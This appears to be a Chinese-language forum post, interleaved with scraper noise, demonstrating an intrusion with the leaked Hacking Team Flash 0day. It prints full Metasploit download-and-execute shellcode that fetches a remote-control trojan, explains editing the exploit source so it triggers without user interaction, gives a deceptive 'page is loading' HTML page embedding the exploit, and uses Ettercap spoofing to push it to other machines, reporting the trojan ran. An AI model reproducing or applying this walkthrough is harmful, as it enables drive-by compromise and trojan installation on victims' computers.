|
' x+ O. E1 Q0 I9 l3 D4 s 三、flash 0day之手工代码修改制作下载者实例入侵演示 5 \3 H+ S! _1 m4 X
; c6 K- D! `' C8 Y; ~9 w, v( a
) s4 Q7 X- r" B* E1 D 利用到的工具: 3 P! G$ S8 A( ^0 v, I7 E7 n
% e9 R5 X5 s7 {2 D+ T
% i9 O; s3 T* p2 S9 t) F
Msf # C9 }: ~8 t. l2 J4 |$ p
, }% |$ e, f5 L* f& S) Q! Y/ ?( N
0 W$ T: O, o* F' O! ` Y$ v4 E Ettercap
/ H9 \. t/ q; ~( O ( Z9 w0 U, z$ r; W
& g% a6 x+ j. Z$ ^" @' j
Adobe Flash CS6 0 k8 [ K6 k; P, H$ k) n
% `5 H! y& G$ [0 A- a
8 j+ f! G( c+ i# z9 |& ~) F
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 - y5 a8 ]7 _' u5 q9 W8 N0 Z
6 T5 U2 \2 D: G. v, N) k
" j' w @8 P) k% {8 z( a; q0 M
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ' S1 f7 F6 B6 o) n' P$ _8 T
; \* D: [: ~: [; H( L; G/ R9 d- d1 ]
7 N2 T' e+ D# N; e3 Y* |% }+ } 如图:
/ I; p& O \0 g0 K1 { - h4 d7 B5 F" h9 S0 c5 E
$ H/ q) `3 B2 s" Q 4 F# c3 A" ~: c9 u- ?' m" P; _( ?
5 a K) E& x9 Z/ I1 C
8 ^1 s- Q9 j' x7 M( H. z
; a7 m4 k0 w* s
7 v! p5 M: |' V* E! p) s. [; m
! ^6 Q& G* N3 S% [" J 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
' X( I0 s1 C; d
T9 P" H' l" N! s: X! M3 _! V, ?1 y" h' m( [: ^ B- Q3 S
2 m5 J6 x" L5 d6 F {+ b
1 _% l& l$ {" ~: \& j
- [" g! L1 G: v* i8 F+ X  3 n( q" T1 C* ^1 w! S5 m& ]
% w8 R n' T4 d
0 c9 B0 t3 y% d! S 然后执行generate -t dword生成shellcode,如下:
8 G9 W# E1 Q2 v6 [9 H5 W1 n7 h
. m7 ^# O( Z; y0 e2 Z4 h
8 l6 |4 P& j' \  * `1 |2 A8 U: r( Y* y) P
g0 [ C9 I% K7 M" d
4 J9 O& p% `: b: f1 T9 r 复制代码到文本下便于我们一会编辑flash exp,如下:
: m. s, F; o% L! B$ F# j
$ M7 l) t" Z' @: r) e' x6 |! `
" }& K4 y8 p' x4 h' U 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
. e5 e; [; B" k9 R: X% r6 U# g
0 t2 ~4 Z. n4 H C4 D8 ~. P5 B
# Q' y* N$ N6 y: T. U 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ! E7 U5 g- W4 K4 C" {$ _) ]4 B6 `
' Z- {( Z$ l: k2 ?+ w+ z
2 u2 o' _9 f8 f4 G! T! ~7 E
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
* I0 {9 s8 u$ J' D. m4 S i + B& X/ d& _& c! o5 ~& n) T$ c
8 P% ?4 Y- X$ P7 y# s/ K 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
& q* n* m4 s8 F) c : N) g5 e; J. T5 |0 M' h
3 k* ?' t- N2 ? 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
?8 }: b* ?5 l) J0 a0 x9 D& H; D
, [4 K% W. B. C8 e
5 g7 ?% U' E1 n! h! L 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
* S: a9 j( i: o0 a
7 u) t5 N, S: [, L/ k# g) z6 ^. V( \7 ]9 r
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! I- f0 `0 ]5 [; v$ Z; n; t/ \" {
8 @- D k+ j' L" @1 G* `5 c
5 P! j3 ~+ A; F6 {4 H' w4 f
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
; J8 f; Y+ m) W" v# f8 p . e L4 ^8 f2 h& h6 C; L
2 p) M8 h# D4 j6 I' A
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 3 j/ d3 a! x* P) d
7 r% a% w) B2 I- _2 ~* c- }+ b- `, L+ {& _& G' d
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, , L, r1 O" Q4 Q0 w; S4 q' \# Q
& w9 a. m" X9 A$ u" n; H
! f2 v# B M# ~7 @: x 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, $ D ?: E8 n& @+ K; e' G6 T
& T, f; O5 Y4 ]1 P( P
+ \- L i; E. ?6 K a- m5 U 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ; h6 e O0 f, x/ E( H8 ^
5 ]5 l2 G. s7 J9 v2 O+ R5 ^6 X) G3 \8 a* j: ^
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, , [3 F& \5 ^/ V+ ^% J
3 N* U0 F5 E n6 ~' y- g7 v& d4 v* d' N2 y
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
% k1 f; P. `# H. N8 N1 K
, C0 w4 @ C) a" Y% J! f
+ x8 ^, M. X" Q% ?( X6 u# s
: v/ K, G' Y% s- g
7 y) s' G$ P7 @, k# W8 f$ G
9 M& b2 Z, c, e4 d# i ! m0 S, Z( l$ y8 _; k0 X& `
) _6 g% |9 ^% U, O8 b$ k$ k& y S @ L
$ N3 ~) u9 s3 s: S. x) Q+ V. s
下面我们来修改flash 0day exp,需要修改三个文件,分别为: . L9 n: [% s- \6 u
% D# | C/ h# i: X* |$ x0 a; x- V7 |
8 q& x( Z) z/ j0 [2 U0 q
, @! w& F8 u- [" Z9 p, J) a1 g7 w" [9 h) g- |4 K; R
先修改ShellWin32.as,部分源代码如图:
3 l$ M( Q8 n4 K0 \7 e
; l4 R% J8 ~2 v7 M& A1 G! b6 U* q% d( |
3 q+ T- h9 G( E0 ]0 w
5 A. m8 ?& m1 J/ Q0 j- j
9 w: o) X" F- w2 Z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( D- v; l9 a* a0 z+ `
+ t5 F0 J) K) B5 r* ^- o* w0 R& @6 S
 1 y7 N4 b z. N P8 _
# F% a# {$ s/ B: r6 s' D4 `: J
! O6 K; E n1 j3 o+ x8 r
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ) E& }4 \# b0 \& S5 S9 h
, E2 ]6 l* K- R$ c2 ^+ u2 K$ z4 K+ M0 k9 Y' K1 g
" d1 R X9 X% V ! ?# f8 v4 v1 q5 {. N, Z3 _% B) V/ S0 B9 |
* K6 W) Z5 R$ t$ c5 G
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ' u; X! A7 T% d. k! F* j% C- \
; I3 `/ b) ~- J1 i, W
. A; u% q& b; b1 s % n: ?2 \$ t- V7 q+ [
1 T5 Y: o6 l4 V. Q0 N# c
, L$ v* i: q- r* X4 a: o2 z5 r 8 [4 j2 f, e6 }, z% g
5 g, R( M ]! J9 ~$ s7 T3 B. E( ]9 q" g
- D* H! {5 i% y
4 j$ I' B+ I; K" a$ P
H) c& l K' H n+ k! r* Z 然后点保存,下面我们来编译一下,打开 $ n! A9 c9 P5 Y
( m! x3 b! Y7 O# Y6 G. M& n
3 \) K( A, D2 C- ]) q4 R exp1.fla然后点文件-发布,看看编译没错误 : y& M4 O1 i1 C& {% R/ A' v7 g& q
; h+ Q, n4 L B7 F8 K! U& u" e
3 H) a. S$ J- t" ?* @ S 8 u) W# R% W) q5 q2 G5 Y) u
1 ~ i& E: G' v' _3 ?# L* p+ ?9 h0 t0 Z) X* t/ T8 n! e) ]' X
2 d5 x) u' e6 t. o" f7 G. u! Q
9 l+ |5 J) X' k; |
% O" U1 P [: o& t& \/ F2 R
8 B4 [9 C" e- N8 {
4 ~7 a1 n s! y$ O8 [/ ~3 i
3 N. z0 w, e% p v' J" v  4 |- d1 L% a3 j/ O: c) D
8 U2 j0 S* p7 G2 _( C, {! w ]! T. f% {: [1 V3 c
然后我们把生成的
6 } U$ T7 y: d' f5 P+ k" U 3 T' G6 L6 O- w6 O% ~
- M3 E7 { E& P' ]
exp1.swf丢到kailinux 的/var/www/html下: 9 ]/ R% D$ v/ R! d# Z0 s2 O
- G+ D4 S1 L8 x' {' b5 ^' \# m% i$ o' A5 e9 g1 {
然后把这段代码好好编辑一下 ' ]& H' m$ S8 N3 b; a+ i
1 ?/ y0 L1 _, ?; q
- f* L" g7 F! U8 ?
0 J0 v$ y# K0 v3 f; H9 _
8 R& E" o0 H3 M0 Y( r: R
2 o8 k' T l. a( S
8 d% k% k! [9 S0 V7 U) U
1 z) C6 E3 Q# b1 X0 {
- Z7 E# l) S* @" `
5 l1 C( `' }; ?0 f! f 2 T# O3 i7 v+ y! G, F g% }' L
% U) ^2 w" _3 j V3 }4 [
* n* w9 U$ a- v$ m! p
, ]$ s6 M2 f' o% J/ u+ L& C4 a5 x2 s7 ` c5 p
4 D' Q7 m- \" @ `3 _
3 O" G% u1 r8 p9 {# y
) `$ H5 P' \+ t9 G/ ` ! C# M' w& P+ B. I9 u' }/ P
8 X( @) o' z1 ~* I# r9 H7 H0 Z1 ~% x" s/ s/ Z$ O: f
<!DOCTYPE html>
4 g3 R( V3 s) {( ~ " Y( U6 K) F: ?2 B3 t, n
! d! x4 D1 a, o$ f' M <html> : T+ `4 Z) M: F+ J% Q- L+ T7 P; k
) X# q5 J# @) ~# `$ J' p( V
. }; C2 r& _( p) w6 A6 N <head> 2 T/ @3 ~$ d) c$ r9 q+ G% w# P% {
8 ?& c6 q3 o& `/ N( s
' L% Q" t p8 q3 u$ u <meta http-equiv="Content-Type" content="text/html;
5 c" G3 Q6 d, ?7 N: V1 O) M
0 r( \, z6 `" ~ D
+ _$ a) _/ O% u' N8 K/ W4 T charset=utf-8"/>
/ B) s6 o, n/ N% j8 n/ i+ L
; O# m9 r1 y( J: E% w
- l i( {8 V6 A4 d. Q8 ~: ?$ A) W </head>
$ Q8 f! ^+ G/ T; Q# ]
- o& A9 D4 }; w* P6 P6 c9 G& S6 B: [& |% L
<body> : \" P; R6 V/ e1 T$ k
# d, f. h8 N) r4 c4 K4 X* x+ r( s
) N' f, r7 a) J6 Q, f* t1 B& t
<h2> Please wait, the requested page is loading...</h2> # @' V; o n/ i8 U1 h$ P* r
- ~9 e8 U% R% G V, o3 M1 x
4 \9 c5 k( X# v
<br> 5 v3 O: E% \# d- }# \/ ?8 [
. q, A) G. }7 {3 \
) T: @+ C$ s& j9 e) j# U6 L <OBJECT 9 s& P. T/ m, S* T
' l: l3 D# s, s# M! i5 g
6 ^ L B& W u9 ^9 S classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 8 b* N) A, p. C Q8 ^6 V, I4 w. I: @
) [5 U1 x0 d' w0 L8 `9 Q) B. y$ o y, p. g% N B- h' E) C
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
7 J: R) h5 N8 x' {4 G 1 s2 {8 F# L. a
X) L9 a3 a$ ` [! m </body> # _& M6 y* L) T5 L
! \) P# Q/ x* C. j# n0 R
* \* U. X8 l+ L. | <script> 5 z0 r; O% \% `9 r& ]! R
& p1 r e- d" J! e0 j9 d
5 r6 }1 m2 j% f* y" d0 N+ Z setTimeout(function () {
0 w* ~- g& ?0 x 3 L7 ?+ |2 X/ ^
- X# ?. b4 y* q3 L% b- p 5 S$ [9 t6 S. ?" T% Y4 h5 d
1 p$ ^1 i! b6 O# l
: X T1 N8 Q# A+ \
window.location.reload();
# k O& h3 F* E7 J/ e; w F8 X
& w+ y/ h/ d9 Q. o r" O7 h/ o3 ^' l0 ?0 y
}, 10000);
! F2 T9 U; I0 n# h4 L5 t
: g' R2 ^3 \7 i! h* G9 V, }
5 A8 h0 f* [5 r3 G4 D: S
2 L. ?) I2 ~: r9 \
( B& \: P H+ C$ A7 T/ w
5 _ g2 r! u+ s" M9 j </script> 1 p% x% s- F0 R2 {* V
* K7 o- O' z! f0 ]* H6 X0 s$ [3 E
: ~ r$ L G8 ~, N# ~. B
</html> 2 z( O! d8 }4 j2 |
0 I& ?$ S- {7 A ~9 V S' x
" Z9 ^" r+ t. E- T: j
2 y+ J, N5 D' A7 {, M / x- C* h, d4 y( ~
2 w+ A. `+ b* l5 O; w
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
% {+ P! g0 k% T8 O0 B1 f 6 i0 L# \! Z7 }' U8 @1 A B
' e: N1 f7 e& B' A) | 
% p8 `. y4 E1 h' C# _ h $ O D- I* i }8 ?! h/ l
d; G" G* O# ~* W& S& a
5 T' \( T( y% g2 q$ b+ \- b & T0 U7 Y. w, w$ N
+ o+ ?0 m& K$ K, z
) _! S6 l* o0 c' A9 z4 J* E9 {
8 g9 l" f! O: I: x7 M$ B6 ?6 L$ f
* v0 h& a3 d. u * I$ v, W, I5 D& |2 Y
6 e5 L) X, Y X- @ 5 O1 F* G% c$ y( `
+ R: N0 E8 `3 t" o: k# U& u$ M
9 z$ L* e7 ?, A+ ?, y h6 ^ 下面我们用ettercap欺骗如图: v* i0 {0 C6 [3 V! c
8 E+ }0 P7 ?7 E8 s4 b5 Z7 U) E J v6 k" k
1 x7 C+ t% U- c # J6 f! Z3 z' J9 l+ O
/ j9 J1 O) s. d- J9 S! M* D
: m& a! c: n% F$ v2 B
4 y/ u# {' K) ~7 |. f* ?7 u* n: q! q! S" u
下面我们随便访问个网站看看:
( n! K7 f. S5 N, M/ ]( [9 O" L( ]
6 D( d4 k4 Y# C4 g! U
( m, p1 W$ X' o# S C* ? 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: : H) B: J" X: p. x1 g$ Y
& P' e: T$ {9 X1 j' K$ M
/ r! l3 W7 S! V/ c$ K) t# P- A 
; ], Z: a& ~3 v 9 V+ O! z& W1 O4 Y ^# c
8 R& p! w/ s$ L1 w! W8 D
我们看另一台,
; r( q$ Q0 `: F- L' q
- Z4 Q" l8 F: j8 o6 S; _2 U$ p3 W- }4 \; x- \9 t
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
$ p+ c% F2 U6 z" _7 { | 
发表于 2018-10-20 20:28:55
收藏
分享
支持
反对